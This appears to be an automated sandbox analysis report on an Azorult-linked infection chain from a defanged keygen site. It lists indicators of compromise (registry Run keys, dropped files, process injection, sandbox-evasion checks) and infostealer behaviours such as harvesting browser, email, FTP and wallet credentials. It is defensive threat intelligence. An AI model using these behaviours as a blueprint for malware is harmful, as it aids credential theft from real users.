azorult | hxxps://keygenit[.]com/d/8550ceeb125094q2480[.]html

System Information Discovery

Processes:

Bedofufomae.exekeygen-step-4.exeWodarihaeqy.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Bedofufomae.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	keygen-step-4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Wodarihaeqy.exe

Loads dropped DLL 28 IoCs

Processes:

rundll32.exeregsvr32.exeInstall.tmp5341.tmp.exekabo.exeIrecCH6.tmpi-record.exeiwhuvbssoftware_reporter_tool.exeiwhuvbsiwhuvbs

pid	process
2748	rundll32.exe
5056	regsvr32.exe
2832	Install.tmp
3828	5341.tmp.exe
3828	5341.tmp.exe
3828	5341.tmp.exe
3828	5341.tmp.exe
3828	5341.tmp.exe
5940	kabo.exe
5452	IrecCH6.tmp
1312	i-record.exe
1312	i-record.exe
1312	i-record.exe
1312	i-record.exe
1312	i-record.exe
1312	i-record.exe
1312	i-record.exe
1312	i-record.exe
6908	iwhuvbs
5708	software_reporter_tool.exe
5708	software_reporter_tool.exe
5708	software_reporter_tool.exe
5708	software_reporter_tool.exe
5708	software_reporter_tool.exe
5708	software_reporter_tool.exe
5708	software_reporter_tool.exe
6908	iwhuvbs
6708	iwhuvbs

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

2918611.exeUltra.exeBAC6.tmp.exeplayer_record_48792.exegcttt.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	2918611.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Hinubylyse.exe\""	Ultra.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	BAC6.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe"	BAC6.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Devenawybi.exe\""	player_record_48792.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

jg6_6asg.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg6_6asg.exe

Drops Chrome extension 1 IoCs

Processes:

askinstall20.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

112 api.ipify.org
286 ip-api.com

flow	ioc
112	api.ipify.org
286	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\Q3I2IKJL.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\Q3I2IKJL.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent E9B3093C8E612604	svchost.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

regsvr32.exe

pid process

5056 regsvr32.exe

pid	process
5056	regsvr32.exe

Suspicious use of SetThreadContext 12 IoCs

Processes:

svchost.exekey.exekeygen-step-2.exekeygen-step-2.exeBAC6.tmp.exeB7E7.tmp.exekabo.exeiwhuvbsiwhuvbsiwhuvbs

description	pid	process	target process
PID 2908 set thread context of 4788	2908	svchost.exe	svchost.exe
PID 4644 set thread context of 3832	4644	key.exe	key.exe
PID 5088 set thread context of 4876	5088	keygen-step-2.exe	keygen-step-2.exe
PID 4876 set thread context of 4700	4876	keygen-step-2.exe	keygen-step-2.exe
PID 2908 set thread context of 584	2908	svchost.exe	svchost.exe
PID 5840 set thread context of 6068	5840	BAC6.tmp.exe	msiexec.exe
PID 5840 set thread context of 1280	5840	BAC6.tmp.exe	msiexec.exe
PID 5724 set thread context of 5468	5724	B7E7.tmp.exe	Conhost.exe
PID 6036 set thread context of 5940	6036	kabo.exe	kabo.exe
PID 6668 set thread context of 6908	6668	iwhuvbs	iwhuvbs
PID 1372 set thread context of 6908	1372	iwhuvbs	iwhuvbs
PID 4216 set thread context of 6708	4216	iwhuvbs	iwhuvbs

Drops file in Program Files directory 48 IoCs

Processes:

irecord.tmpFree.exeultramediaburner.tmpplayer_record_48792.exeUltra.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\recording\avutil-51.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\swscale-2.dll	irecord.tmp
File created	C:\Program Files (x86)\recording\is-A6EVN.tmp	irecord.tmp
File created	C:\Program Files (x86)\recording\is-RD4EF.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\unins000.dat	irecord.tmp
File created	C:\Program Files\nio.dll	Free.exe
File opened for modification	C:\Program Files (x86)\recording\avformat-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\AForge.Video.FFMPEG.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\avdevice-53.dll	irecord.tmp
File created	C:\Program Files (x86)\recording\is-AG3PL.tmp	irecord.tmp
File created	C:\Program Files (x86)\recording\is-JTB49.tmp	irecord.tmp
File created	C:\Program Files\management.dll	Free.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe.config	player_record_48792.exe
File opened for modification	C:\Program Files (x86)\recording\AForge.Video.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\avcodec-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\postproc-52.dll	irecord.tmp
File created	C:\Program Files (x86)\recording\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\recording\is-FNU4K.tmp	irecord.tmp
File created	C:\Program Files\install.dat	Free.exe
File created	C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe.config	Ultra.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\recording\is-K6US7.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\Bunifu_UI_v1.52.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\avfilter-2.dll	irecord.tmp
File created	C:\Program Files (x86)\Google\Devenawybi.exe	player_record_48792.exe
File created	C:\Program Files (x86)\recording\is-LFH5K.tmp	irecord.tmp
File created	C:\Program Files (x86)\recording\is-KBH18.tmp	irecord.tmp
File created	C:\Program Files\install.dll	Free.exe
File created	C:\Program Files (x86)\Microsoft.NET\Hinubylyse.exe.config	Ultra.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\recording\is-21IJO.tmp	irecord.tmp
File created	C:\Program Files (x86)\recording\is-B1KQ9.tmp	irecord.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-Q78KB.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\recording\i-record.exe	irecord.tmp
File created	C:\Program Files (x86)\recording\is-T8T4I.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\recording\swresample-0.dll	irecord.tmp
File created	C:\Program Files (x86)\recording\is-BUGUU.tmp	irecord.tmp
File created	C:\Program Files (x86)\Google\Devenawybi.exe.config	player_record_48792.exe
File created	C:\Program Files\Windows Portable Devices\XWIZCURLMR\ultramediaburner.exe	Ultra.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-FOLUK.tmp	ultramediaburner.tmp
File created	C:\Program Files\Windows Portable Devices\RTXNOGSPYS\irecord.exe	player_record_48792.exe
File created	C:\Program Files (x86)\Microsoft.NET\Hinubylyse.exe	Ultra.exe
File created	C:\Program Files (x86)\recording\is-UQRN8.tmp	irecord.tmp
File created	C:\Program Files (x86)\recording\is-V3ECR.tmp	irecord.tmp
File created	C:\Program Files\verify.dll	Free.exe
File opened for modification	C:\Program Files (x86)\recording\unins000.exe	irecord.tmp
File created	C:\Program Files (x86)\recording\is-IKGOM.tmp	irecord.tmp

Drops file in Windows directory 2 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3980 4876 WerFault.exe keygen-step-2.exe

pid	pid_target	process	target process
3980	4876	WerFault.exe	keygen-step-2.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

kabo.exeiwhuvbsiwhuvbsiwhuvbs

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	kabo.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	kabo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iwhuvbs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	kabo.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3844 timeout.exe

pid	process
3844	timeout.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exechrome.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4108 taskkill.exe
3800 taskkill.exe

pid	process
4108	taskkill.exe
3800	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

svchost.exesvchost.exefilee.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	filee.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe

Modifies registry class 64 IoCs

Processes:

svchost.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeFree.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 455c1d36f735d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\ = "1103"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "325697290"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify.	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "29"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 52450c8ef935d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\ = "9"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{A7261DD9-2A45-4AD3-85D2-3D816CF2317D} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "325765947"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "28"	rundll32.exe
